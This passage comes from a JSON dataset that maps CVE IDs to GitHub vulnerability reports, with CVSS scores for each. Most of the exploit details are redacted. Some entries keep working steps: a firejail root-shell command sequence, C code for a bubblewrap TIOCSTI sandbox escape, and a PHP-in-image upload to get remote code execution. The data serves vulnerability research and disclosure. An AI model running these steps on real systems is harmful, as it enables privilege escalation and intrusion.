  11993. "Issue_Created_At": "2018-05-27T23:28:05Z",
  11994. "description": "Crash in libssh when port NUMBERTAG response is unexpected. Nmap NUMBERTAG crashes when running either of the following two scripts against an open port NUMBERTAG which is not recognised as SSH: APITAG and APITAG . ERRORTAG I managed to narrow it down to these scripts and one particular host, and created a minimised test case that can be run locally: APITAG APITAG This will cause a crash, sometimes with Segmentation fault or sometimes with double free or corruption . Sample output with APITAG : ERRORTAG If I disable those two scripts, then Nmap doesn't crash, and the host output looks like: CODETAG Hope that helps in diagnosing the issue. Please can you look into it?",
  11995. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  11996. "severity": "HIGH",
  11997. "baseScore": 7.5,
  11998. "impactScore": 3.6,
  11999. "exploitabilityScore": 3.9
  12000. },
  12001. {
  12002. "CVE_ID": "CVE-2017-18594",
  12003. "Issue_Url_old": "https://github.com/nmap/nmap/issues/1077",
  12004. "Issue_Url_new": "https://github.com/nmap/nmap/issues/1077",
  12005. "Repo_new": "nmap/nmap",
  12006. "Issue_Created_At": "2017-12-04T20:18:13Z",
  12007. "description": "NMAP crash with ssh auth APITAG When testing ssh auth methods.nse against non standard ports, I forgot to specify ports and NMAP crashed. I have narrowed it down to running the script against port NUMBERTAG I ran a debug and found the crash appears to be caused by a double free of session data. This appears to be due to a session pointer not being APITAG after the session is freed. Attached is a patch that appears to fix the issue. FILETAG",
  12008. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  12009. "severity": "HIGH",
  12010. "baseScore": 7.5,
  12011. "impactScore": 3.6,
  12012. "exploitabilityScore": 3.9
  12013. },
  12014. {
  12015. "CVE_ID": "CVE-2017-18635",
  12016. "Issue_Url_old": "https://github.com/novnc/noVNC/issues/748",
  12017. "Issue_Url_new": "https://github.com/novnc/novnc/issues/748",
  12018. "Repo_new": "novnc/novnc",
  12019. "Issue_Created_At": "2017-01-12T19:58:56Z",
  12020. "description": "FILETAG , as well as APITAG",
  12021. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12022. "severity": "MEDIUM",
  12023. "baseScore": 6.1,
  12024. "impactScore": 2.7,
  12025. "exploitabilityScore": 2.8
  12026. },
  12027. {
  12028. "CVE_ID": "CVE-2017-18638",
  12029. "Issue_Url_old": "https://github.com/graphite-project/graphite-web/issues/2008",
  12030. "Issue_Url_new": "https://github.com/graphite-project/graphite-web/issues/2008",
  12031. "Repo_new": "graphite-project/graphite-web",
  12032. "Issue_Created_At": "2017-07-28T22:37:00Z",
  12033. "description": "APITAG vulnerable to SSRF. (I didn't discover this, it was publicly described here: URLTAG URLTAG Some sort of validation should be performed on the server component of the URL (possibly a whitelist in settings ? I'm not overly familiar with the design of this module). Currently it's possible to use this view to make HTTP requests to services visible from the server.",
  12034. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  12035. "severity": "HIGH",
  12036. "baseScore": 7.5,
  12037. "impactScore": 3.6,
  12038. "exploitabilityScore": 3.9
  12039. },
  12040. {
  12041. "CVE_ID": "CVE-2017-18869",
  12042. "Issue_Url_old": "https://github.com/isaacs/chownr/issues/14",
  12043. "Issue_Url_new": "https://github.com/isaacs/chownr/issues/14",
  12044. "Repo_new": "isaacs/chownr",
  12045. "Issue_Created_At": "2017-07-02T07:22:36Z",
  12046. "description": "This package appears to have a TOCTOU bug. CVETAG",
  12047. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
  12048. "severity": "LOW",
  12049. "baseScore": 2.5,
  12050. "impactScore": 1.4,
  12051. "exploitabilityScore": 1.0
  12052. },
  12053. {
  12054. "CVE_ID": "CVE-2017-18924",
  12055. "Issue_Url_old": "https://github.com/oauthjs/node-oauth2-server/issues/637",
  12056. "Issue_Url_new": "https://github.com/oauthjs/node-oauth2-server/issues/637",
  12057. "Repo_new": "oauthjs/node-oauth2-server",
  12058. "Issue_Created_At": "2020-07-16T00:26:02Z",
  12059. "description": "Multiple Security Vulnerabilities in Auth and Token Endpoint. I would like to report several security vulnerabilities that I found while using this APITAG server library. The vulnerabilities and their consequences are listed as following: Vulnerability NUMBERTAG Missing PKCE support for public clients. APITAG As specified in RFC NUMBERTAG URLTAG public clients (e.g., mobile/desktop apps) using Authorization Code Flow are susceptible to authorization code interception attack and PKCE is recommended to mitigate this attack. Since public clients cannot maintain client side confidentiality regarding client secrets, such attacks have been noticed in the wild extensively. Vulnerability NUMBERTAG Does not revoke previously issued token if authorization_code is used more than once. APITAG As specified in RFC NUMBERTAG FILETAG If an authorization code is used more than once, the authorization server must deny the request and should revoke all tokens previously issued based on that authorization code. Though APITAG server currently denies the request in such cases, it doesn't revoke the tokens issued previously to the client, which leaves the user's resources vulnerable as attackers might exploit the previous tokens to get them. Vulnerability NUMBERTAG Allows fragment in the redirect URI. APITAG Many APITAG attacks regarding misuse of redirect uris have been observed in the wild. As specified in the RFC NUMBERTAG FILETAG authorization server should not allow fragments in the redirect uri as it allows the attackers to exploit the redirect uri and hence intercept the auth_code/token. Any comments or fixes regarding these vulnerabilities? Thank you.",
  12060. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  12061. "severity": "HIGH",
  12062. "baseScore": 7.5,
  12063. "impactScore": 3.6,
  12064. "exploitabilityScore": 3.9
  12065. },
  12066. {
  12067. "CVE_ID": "CVE-2017-18925",
  12068. "Issue_Url_old": "https://github.com/OpenRC/opentmpfiles/issues/4",
  12069. "Issue_Url_new": "https://github.com/openrc/opentmpfiles/issues/4",
  12070. "Repo_new": "openrc/opentmpfiles",
  12071. "Issue_Created_At": "2017-12-24T15:04:21Z",
  12072. "description": "Unsafe use of \"chown dereference\" in directory types. The default behavior of chown when called _without_ the APITAG flag is to follow symlinks. At least the d type, and possibly the f type, can exploit that fact to take ownership of arbitrary files on the system. For example, CODETAG The first time that opentmpfiles setup is run, things are fine; but then suppose I replace \"foo\" with a symlink: APITAG and restart the service... ERRORTAG The call to chown has followed my symlink, and given me ownership of APITAG : APITAG The tmpfiles specification is silent on whether or not symlinks should be followed in this case, however, the same vulnerability was addressed in APITAG checkpath helper in Gentoo bug NUMBERTAG CVETAG .",
  12073. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  12074. "severity": "MEDIUM",
  12075. "baseScore": 5.5,
  12076. "impactScore": 3.6,
  12077. "exploitabilityScore": 1.8
  12078. },
  12079. {
  12080. "CVE_ID": "CVE-2017-20004",
  12081. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/41622",
  12082. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/41622",
  12083. "Repo_new": "rust-lang/rust",
  12084. "Issue_Created_At": "2017-04-29T07:11:01Z",
  12085. "description": "APITAG APITAG must not be sync. Right now, APITAG satisfies the Sync bound. That is rather bad, because it lets me write a program that has a data race: ERRORTAG The get and set calls in the two threads are unsynchronized (as usual for a Cell ), and they are racing. This is a soundness bug. The cause for this is that APITAG implements Sync whenever T implements Send , which is plain wrong. The fix is to let APITAG implements Sync whenever T implements Sync . I will submit a PR soon.",
  12086. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  12087. "severity": "MEDIUM",
  12088. "baseScore": 5.9,
  12089. "impactScore": 3.6,
  12090. "exploitabilityScore": 2.2
  12091. },
  12092. {
  12093. "CVE_ID": "CVE-2017-3204",
  12094. "Issue_Url_old": "https://github.com/golang/go/issues/19767",
  12095. "Issue_Url_new": "https://github.com/golang/go/issues/19767",
  12096. "Repo_new": "golang/go",
  12097. "Issue_Created_At": "2017-03-29T15:29:51Z",
  12098. "description": "PATHTAG make APITAG APITAG non permissive by default. APITAG interprets nil as \"accept any host keys\". This is not a great default from a security perspective. Many clients probably should set APITAG to something real but are not. It was written this way in PATHTAG to preserve backwards compatibility with the original implementation, but that was probably not the right balance to strike. This issue is to make APITAG mean \"reject all host keys\" and at the same time provide at least func APITAG APITAG func APITAG []byte) APITAG and maybe also func APITAG string) APITAG Thanks to Phil Pennock for pointing out this problem.",
  12099. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12100. "severity": "HIGH",
  12101. "baseScore": 8.1,
  12102. "impactScore": 5.9,
  12103. "exploitabilityScore": 2.2
  12104. },
  12105. {
  12106. "CVE_ID": "CVE-2017-5207",
  12107. "Issue_Url_old": "https://github.com/netblue30/firejail/issues/1023",
  12108. "Issue_Url_new": "https://github.com/netblue30/firejail/issues/1023",
  12109. "Repo_new": "netblue30/firejail",
  12110. "Issue_Created_At": "2017-01-06T23:32:15Z",
  12111. "description": "Root shell via bandwidth and shell. APITAG current HEAD, commit NUMBERTAG In a first window run: $ firejail noprofile name=x net=eth0 In a second window, firstly create a dumb shell that ignores APITAG : $ echo 'int APITAG {system( PATHTAG );}' | gcc xc o dumbshell and then secondly invoke that shell via the APITAG and APITAG flags to obtain root: $ firejail APITAG bandwidth=x status id uid NUMBERTAG root) gid NUMBERTAG root) APITAG APITAG Error occurs at URLTAG char arg NUMBERTAG arg NUMBERTAG APITAG arg NUMBERTAG c\"; arg NUMBERTAG cmd; arg NUMBERTAG NULL; APITAG execvp(arg NUMBERTAG arg); I don't see any good reason to permit a user specified shell to run a bandwidth command.",
  12112. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12113. "severity": "HIGH",
  12114. "baseScore": 7.8,
  12115. "impactScore": 5.9,
  12116. "exploitabilityScore": 1.8
  12117. },
  12118. {
  12119. "CVE_ID": "CVE-2017-5226",
  12120. "Issue_Url_old": "https://github.com/projectatomic/bubblewrap/issues/142",
  12121. "Issue_Url_new": "https://github.com/containers/bubblewrap/issues/142",
  12122. "Repo_new": "containers/bubblewrap",
  12123. "Issue_Created_At": "2017-01-09T17:17:37Z",
  12124. "description": "CVETAG bubblewrap escape via TIOCSTI ioctl. On Debian bug APITAG , Federico Bento APITAG writes: > When executing a program via the bubblewrap sandbox, the nonpriv > session can escape to the parent session by using the TIOCSTI ioctl to > push characters into the terminal's input buffer, allowing an attacker > to escape the sandbox. > > This has been assigned CVETAG . > > ` > $ cat test.c > include APITAG > include APITAG > include APITAG > > int APITAG > { > char cmd = \"id \"; > while( cmd) > ioctl NUMBERTAG TIOCSTI, cmd++); > execlp( PATHTAG \"id\", NULL); > } > $ gcc test.c o /tmp/test > $ bwrap ro bind /lib NUMBERTAG lib NUMBERTAG ro bind /home /home ro bind /bin /bin > ro bind /tmp /tmp chdir / unshare pid uid NUMBERTAG tmp/test > id > uid NUMBERTAG gid NUMBERTAG groups NUMBERTAG id < did not type this > uid NUMBERTAG saken) gid NUMBERTAG saken) groups NUMBERTAG saken) I don't know who assigned the CVE ID or whether the bug reporter has made any attempt to report it upstream already.",
  12125. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
  12126. "severity": "CRITICAL",
  12127. "baseScore": 10.0,
  12128. "impactScore": 6.0,
  12129. "exploitabilityScore": 3.9
  12130. },
  12131. {
  12132. "CVE_ID": "CVE-2017-5345",
  12133. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/60",
  12134. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/60",
  12135. "Repo_new": "semplon/genixcms",
  12136. "Issue_Created_At": "2017-01-06T18:44:45Z",
  12137. "description": "safety problem. APITAG CODETAG I think you know this. CODETAG but it need editor. this is my exp: CODETAG APITAG FILETAG",
  12138. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12139. "severity": "HIGH",
  12140. "baseScore": 8.8,
  12141. "impactScore": 5.9,
  12142. "exploitabilityScore": 2.8
  12143. },
  12144. {
  12145. "CVE_ID": "CVE-2017-5346",
  12146. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/61",
  12147. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/61",
  12148. "Repo_new": "semplon/genixcms",
  12149. "Issue_Created_At": "2017-01-09T10:27:25Z",
  12150. "description": "[sql injection]. [sql injection NUMBERTAG issue1: PATHTAG APITAG exp1: CODETAG NUMBERTAG issue2: PATHTAG APITAG exp2: CODETAG",
  12151. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  12152. "severity": "HIGH",
  12153. "baseScore": 7.2,
  12154. "impactScore": 5.9,
  12155. "exploitabilityScore": 1.2
  12156. },
  12157. {
  12158. "CVE_ID": "CVE-2017-5475",
  12159. "Issue_Url_old": "https://github.com/s9y/Serendipity/issues/439",
  12160. "Issue_Url_new": "https://github.com/s9y/serendipity/issues/439",
  12161. "Repo_new": "s9y/serendipity",
  12162. "Issue_Created_At": "2017-01-12T13:44:39Z",
  12163. "description": "Check CSRF token for comment deletion. As reported by Lee Sheldon Victor: We need to utilize a comment token when calling APITAG (via APITAG to protect against CSRF.",
  12164. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12165. "severity": "HIGH",
  12166. "baseScore": 8.8,
  12167. "impactScore": 5.9,
  12168. "exploitabilityScore": 2.8
  12169. },
  12170. {
  12171. "CVE_ID": "CVE-2017-5480",
  12172. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/35",
  12173. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/35",
  12174. "Repo_new": "b2evolution/b2evolution",
  12175. "Issue_Created_At": "2017-01-14T07:27:00Z",
  12176. "description": "Delete or read any files on the server. hi: I find a vulnerability in version NUMBERTAG stable, an attacker can exploit this vulnerability to delete or read any files on the server,it can also be used to determine whether a file exists. In PATHTAG parameter APITAG is vulnerable. So an attacker can use PATHTAG to traversal directory. If you want to know more details about the vulnerability, please send me an email.My email is EMAILTAG",
  12177. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
  12178. "severity": "HIGH",
  12179. "baseScore": 8.1,
  12180. "impactScore": 5.2,
  12181. "exploitabilityScore": 2.8
  12182. },
  12183. {
  12184. "CVE_ID": "CVE-2017-5494",
  12185. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/34",
  12186. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/34",
  12187. "Repo_new": "b2evolution/b2evolution",
  12188. "Issue_Created_At": "2017-01-14T06:50:16Z",
  12189. "description": "some vulnerabilities. Hi I find some Vulnerabilities in b2evolution CMS\u2019s upload policy. First, all upload filename will not be modifed. It means attacker can guess where the upload file in. Second, comment and avadar allow upload swf file and the swf file will execute by flowplayer_plugin. We know, we can insert script code in flash swf, it means we can code execute through swf file.",
  12190. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12191. "severity": "MEDIUM",
  12192. "baseScore": 5.4,
  12193. "impactScore": 2.7,
  12194. "exploitabilityScore": 2.3
  12195. },
  12196. {
  12197. "CVE_ID": "CVE-2017-5506",
  12198. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/354",
  12199. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/354",
  12200. "Repo_new": "imagemagick/imagemagick",
  12201. "Issue_Created_At": "2017-01-12T16:59:40Z",
  12202. "description": "Double free memory corruption. Valgrind output: ERRORTAG Backtrace: ERRORTAG APITAG URLTAG URLTAG",
  12203. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12204. "severity": "HIGH",
  12205. "baseScore": 7.8,
  12206. "impactScore": 5.9,
  12207. "exploitabilityScore": 1.8
  12208. },
  12209. {
  12210. "CVE_ID": "CVE-2017-5509",
  12211. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/350",
  12212. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/350",
  12213. "Repo_new": "imagemagick/imagemagick",
  12214. "Issue_Created_At": "2017-01-10T11:40:37Z",
  12215. "description": "memory corruption Out of bound write . Valgrind output: ERRORTAG APITAG APITAG",
  12216. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12217. "severity": "HIGH",
  12218. "baseScore": 7.8,
  12219. "impactScore": 5.9,
  12220. "exploitabilityScore": 1.8
  12221. },
  12222. {
  12223. "CVE_ID": "CVE-2017-5510",
  12224. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/348",
  12225. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/348",
  12226. "Repo_new": "imagemagick/imagemagick",
  12227. "Issue_Created_At": "2017-01-07T18:26:54Z",
  12228. "description": "Memory corruption via a PSB file. CODETAG Valgrind output: ERRORTAG ` APITAG FILETAG",
  12229. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  12230. "severity": "HIGH",
  12231. "baseScore": 7.8,
  12232. "impactScore": 5.9,
  12233. "exploitabilityScore": 1.8
  12234. },
  12235. {
  12236. "CVE_ID": "CVE-2017-5511",
  12237. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/347",
  12238. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/347",
  12239. "Repo_new": "imagemagick/imagemagick",
  12240. "Issue_Created_At": "2017-01-07T13:58:27Z",
  12241. "description": "Memory corruption via PSB file. CODETAG Valgrind output: ERRORTAG Backtrace: ERRORTAG APITAG FILETAG",
  12242. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12243. "severity": "CRITICAL",
  12244. "baseScore": 9.8,
  12245. "impactScore": 5.9,
  12246. "exploitabilityScore": 3.9
  12247. },
  12248. {
  12249. "CVE_ID": "CVE-2017-5515",
  12250. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/63",
  12251. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/63",
  12252. "Repo_new": "semplon/genixcms",
  12253. "Issue_Created_At": "2017-01-13T08:17:55Z",
  12254. "description": "Possible XSS Vulnerabilities in User Prompt Function. Data in APITAG and APITAG is passed directly to the DOM without any filtering, resulting in XSS vulnerability. CODETAG FILETAG Related codes URLTAG URLTAG URLTAG URLTAG Untrusted input data is in different ways, filter the output node may be a good idea. Whats your opinion?",
  12255. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  12256. "severity": "MEDIUM",
  12257. "baseScore": 5.4,
  12258. "impactScore": 2.7,
  12259. "exploitabilityScore": 2.3
  12260. },
  12261. {
  12262. "CVE_ID": "CVE-2017-5516",
  12263. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/65",
  12264. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/65",
  12265. "Repo_new": "semplon/genixcms",
  12266. "Issue_Created_At": "2017-01-13T10:41:13Z",
  12267. "description": "Multiple XSS in FILETAG / FILETAG . Source APITAG line NUMBERTAG APITAG line NUMBERTAG APITAG APITAG APITAG FILETAG",
  12268. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  12269. "severity": "MEDIUM",
  12270. "baseScore": 6.1,
  12271. "impactScore": 2.7,
  12272. "exploitabilityScore": 2.8
  12273. },
  12274. {
  12275. "CVE_ID": "CVE-2017-5517",
  12276. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/66",
  12277. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/66",
  12278. "Repo_new": "semplon/genixcms",
  12279. "Issue_Created_At": "2017-01-14T08:03:42Z",
  12280. "description": "SQL Injection in APITAG . Source URLTAG CODETAG APITAG APITAG",
  12281. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12282. "severity": "CRITICAL",
  12283. "baseScore": 9.8,
  12284. "impactScore": 5.9,
  12285. "exploitabilityScore": 3.9
  12286. },
  12287. {
  12288. "CVE_ID": "CVE-2017-5518",
  12289. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/64",
  12290. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/64",
  12291. "Repo_new": "semplon/genixcms",
  12292. "Issue_Created_At": "2017-01-13T08:58:32Z",
  12293. "description": "Local URIs Server Side Request Forgery. The media uploader allows the attacker to make server send a GET request to intranet addr or anything which can be accessed via IP address. FILETAG APITAG FILETAG So basicly APITAG installations can send unwanted scrape/scan requests on behalf of their user invoked by the attacker. May be we should rewrite some of the interface in elfinder Similar CVE: APITAG NUMBERTAG Local URIs Server Side Request Forgery ( CVETAG ) CVETAG APITAG NUMBERTAG SSRF Bypass using Octal & Hexedecimal IP addresses ( CVETAG ) CVETAG Serendpity SSRF protection bypass using NUMBERTAG redirect CVETAG See how APITAG fix it: URLTAG URLTAG",
  12294. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N",
  12295. "severity": "HIGH",
  12296. "baseScore": 7.4,
  12297. "impactScore": 4.0,
  12298. "exploitabilityScore": 2.8
  12299. },
  12300. {
  12301. "CVE_ID": "CVE-2017-5519",
  12302. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/67",
  12303. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/67",
  12304. "Repo_new": "semplon/genixcms",
  12305. "Issue_Created_At": "2017-01-14T09:19:56Z",
  12306. "description": "Multiple SQLI caused by functions in APITAG . Source URLTAG Functions APITAG , APITAG and APITAG do not filter any incoming parameters, resulting in many SQL injections. Here is an example. ERRORTAG Injection NUMBERTAG APITAG line NUMBERTAG CODETAG Injection NUMBERTAG APITAG line NUMBERTAG APITAG then APITAG is parsed into APITAG at APITAG line NUMBERTAG ERRORTAG Injection NUMBERTAG APITAG line NUMBERTAG APITAG There are many similar cases, please check it later.",
  12307. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12308. "severity": "CRITICAL",
  12309. "baseScore": 9.8,
  12310. "impactScore": 5.9,
  12311. "exploitabilityScore": 3.9
  12312. },
  12313. {
  12314. "CVE_ID": "CVE-2017-5520",
  12315. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/62",
  12316. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/62",
  12317. "Repo_new": "semplon/genixcms",
  12318. "Issue_Created_At": "2017-01-13T04:42:40Z",
  12319. "description": "Authenticated Remote Command Execution. Version Github latest APITAG NUMBERTAG Login and request APITAG NUMBERTAG Upload an edited png file with php code in it. FILETAG NUMBERTAG Rename ext to APITAG FILETAG FILETAG NUMBERTAG Request uploaded file FILETAG",
  12320. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  12321. "severity": "HIGH",
  12322. "baseScore": 8.8,
  12323. "impactScore": 5.9,
  12324. "exploitabilityScore": 2.8
  12325. },
  12326. {
  12327. "CVE_ID": "CVE-2017-5537",
  12328. "Issue_Url_old": "https://github.com/WeblateOrg/weblate/issues/1317",
  12329. "Issue_Url_new": "https://github.com/weblateorg/weblate/issues/1317",
  12330. "Repo_new": "weblateorg/weblate",
  12331. "Issue_Created_At": "2017-01-09T10:43:05Z",
  12332. "description": "The existence of a weblate account is guessable. Steps to reproduce NUMBERTAG Login to weblate with a valid email, but wrong password Actual behaviour Weblate displays: APITAG with this email address was not found.\" Expected behaviour Weblate displays: APITAG password or username / email address\" Displaying that a user with this email address is not found, makes it possible to do user enumeration to figure out if an account exists. Since dumps of password / email address are widely available and password re use is a thing, displaying if an account is on the server is a valid thread. The login form also does not seem to implement any rate limiting which makes it easy to bruteforce. Server configuration Standard.",
  12333. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  12334. "severity": "MEDIUM",
  12335. "baseScore": 5.3,
  12336. "impactScore": 1.4,
  12337. "exploitabilityScore": 3.9
  12338. },
  12339. {
  12340. "CVE_ID": "CVE-2017-5539",
  12341. "Issue_Url_old": "https://github.com/b2evolution/b2evolution/issues/36",
  12342. "Issue_Url_new": "https://github.com/b2evolution/b2evolution/issues/36",
  12343. "Repo_new": "b2evolution/b2evolution",
  12344. "Issue_Created_At": "2017-01-17T02:30:45Z",
  12345. "description": "traversal directory. hi: I'm sorry to find that this patch of traversal directory is flawed in version NUMBERTAG stable\uff0can attacker can alse exploit this vulnerability to delete or read any files on the server,it can also be used to determine whether a file exists. I will send you an email for the details. My email is EMAILTAG",
  12346. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  12347. "severity": "CRITICAL",
  12348. "baseScore": 9.1,
  12349. "impactScore": 5.2,
  12350. "exploitabilityScore": 3.9
  12351. },
  12352. {
  12353. "CVE_ID": "CVE-2017-5541",
  12354. "Issue_Url_old": "https://github.com/symphonycms/symphony-2/issues/2639",
  12355. "Issue_Url_new": "https://github.com/symphonycms/symphonycms/issues/2639",
  12356. "Repo_new": "symphonycms/symphonycms",
  12357. "Issue_Created_At": "2017-01-17T03:35:38Z",
  12358. "description": "File Manipulation and Cross Site Scripting in FILETAG . File Manipulation URLTAG APITAG Data from $_POST is passed directly into filepath, attacker may control filepath with injecting APITAG . Cross Site Scripting URLTAG ERRORTAG Here data from APITAG to HTML allows attacker to trigger an XSS with payload llike APITAG",
  12359. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  12360. "severity": "MEDIUM",
  12361. "baseScore": 5.3,
  12362. "impactScore": 1.4,
  12363. "exploitabilityScore": 3.9
  12364. },
  12365. {
  12366. "CVE_ID": "CVE-2017-5543",
  12367. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/297",
  12368. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/297",
  12369. "Repo_new": "intelliants/subrion",
  12370. "Issue_Created_At": "2017-01-17T13:20:39Z",
  12371. "description": "Authorized PHP Object Injection. URLTAG ERRORTAG When ERRORTAG is used on user supplied data it often leads to PHP Object Injection. Attacker may generate a string of serialized object and parse it to server backend via APITAG by submitting a login request . Then func ERRORTAG will trigger APITAG and APITAG method in serialized obj, resulting in code execution. Please check other places where the function ERRORTAG is used.",
  12372. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12373. "severity": "CRITICAL",
  12374. "baseScore": 9.8,
  12375. "impactScore": 5.9,
  12376. "exploitabilityScore": 3.9
  12377. },
  12378. {
  12379. "CVE_ID": "CVE-2017-5545",
  12380. "Issue_Url_old": "https://github.com/libimobiledevice/libplist/issues/87",
  12381. "Issue_Url_new": "https://github.com/libimobiledevice/libplist/issues/87",
  12382. "Repo_new": "libimobiledevice/libplist",
  12383. "Issue_Created_At": "2017-01-17T03:56:21Z",
  12384. "description": "APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG d7 at pc NUMBERTAG a NUMBERTAG c bp NUMBERTAG bf NUMBERTAG sp NUMBERTAG bf NUMBERTAG c. I found a heap buffer overflow vulnerability. Should I submit it here and can it be assigned a CVE ID if validated? Should I submit poc after the report is closed? Thanks, here is the stack trace NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG b5e NUMBERTAG d7 at pc NUMBERTAG a NUMBERTAG c bp NUMBERTAG bf NUMBERTAG sp NUMBERTAG bf NUMBERTAG c READ of size NUMBERTAG at NUMBERTAG b5e NUMBERTAG d7 thread T NUMBERTAG a NUMBERTAG b in main PATHTAG NUMBERTAG b5f7fa NUMBERTAG PATHTAG NUMBERTAG ad NUMBERTAG in _start ( PATHTAG NUMBERTAG b5e NUMBERTAG d7 is located NUMBERTAG bytes to the right of NUMBERTAG byte region NUMBERTAG b5e NUMBERTAG d NUMBERTAG b5e NUMBERTAG d3) allocated by thread T0 here NUMBERTAG b NUMBERTAG PATHTAG NUMBERTAG ae in main PATHTAG NUMBERTAG b5f7fa NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG",
  12385. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  12386. "severity": "CRITICAL",
  12387. "baseScore": 9.1,
  12388. "impactScore": 5.2,
  12389. "exploitabilityScore": 3.9
  12390. },
  12391. {
  12392. "CVE_ID": "CVE-2017-5574",
  12393. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/69",
  12394. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/69",
  12395. "Repo_new": "semplon/genixcms",
  12396. "Issue_Created_At": "2017-01-20T11:03:40Z",
  12397. "description": "SQL injection in FILETAG APITAG NUMBERTAG latest version). FILETAG CODETAG the activation param leads to sql injection vulnerability POC: CODETAG We'll find that the database version in the response page, which proved the vulnerability exist. By the way, if you can help me apply for a CVE ID, i will be very grateful.XD",
  12398. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  12399. "severity": "CRITICAL",
  12400. "baseScore": 9.8,
  12401. "impactScore": 5.9,
  12402. "exploitabilityScore": 3.9
  12403. },
  12404. {
  12405. "CVE_ID": "CVE-2017-5575",
  12406. "Issue_Url_old": "https://github.com/semplon/GeniXCMS/issues/68",
  12407. "Issue_Url_new": "https://github.com/semplon/genixcms/issues/68",
  12408. "Repo_new": "semplon/genixcms",
  12409. "Issue_Created_At": "2017-01-19T05:59:56Z",
